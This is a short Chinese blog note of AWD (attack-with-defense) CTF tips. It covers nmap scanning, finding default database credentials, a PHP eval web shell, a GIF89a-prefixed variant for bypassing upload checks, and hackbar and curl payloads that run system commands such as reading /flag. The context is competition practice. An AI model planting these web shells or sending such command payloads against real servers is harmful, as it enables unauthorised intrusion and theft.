【awd】工具及方法记录

找ip 提前写好脚本,跑脚本

nmap扫了一下地址,发现http有几个是admin,看了相关文件夹,还有一个git

怎么加固?
得拖到本地审计

直接在管理员后台关掉了 在管理员页面直接关了

数据库
配置文件 cms 123456 mysql_config.php
config.php

awd 3

1
# nmap -v -A 192.168.20.201

日常记录

hackbar执行windows下的密码函数,post数据传递

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 木马函数
<?php @eval($_POST['cmd']) ?>

# hackbar利用函数 windows
cmd=system(dir);
cmd=system(ipconfig);

# hackbar利用函数 linux
cmd=system(ls);
cmd=system("ls -l");
cmd=system("cat /flag");
# curl利用
curl http://xxx/admin/images/yjh.php -XPOST -H 'Content-type: application/x-www-form-urlencoded' -d"123=system('cat /flag');"

1
2
3
4
# 木马函数
GIF89a<?php @eval($_POST['cmd']) ?>

直接利用就可以

字符转换

crlf -> lf

找组委会

php能不能重启
watchbird能不能用

ctf > unsupported
【awd】工具及方法记录
http://example.com/2023/08/13/ctf/unsupported/【awd】工具及方法记录/
作者
ningan123
发布于
2023年8月13日
许可协议